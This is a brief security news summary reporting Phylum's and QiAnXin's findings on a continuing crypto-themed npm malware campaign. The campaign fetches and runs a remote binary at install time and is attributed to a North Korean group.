Phylum reports that a crypto-themed npm package campaign first described in November remained active, with nearly two dozen additional packages identified through December 2023. The packages download a remote binary during installation, decrypt and execute it, then delete or rename files to leave the package directory looking benign. QiAnXin's reverse engineering linked the downloader malware to a North Korean APT and assessed the npm poisoning as likely Lazarus-related, while Phylum cautions that it could be another North Korean-backed group sharing infrastructure. The campaign appears aimed at cryptocurrency developers, with the likely objective of gaining developer footholds and reaching organizations that hold crypto assets.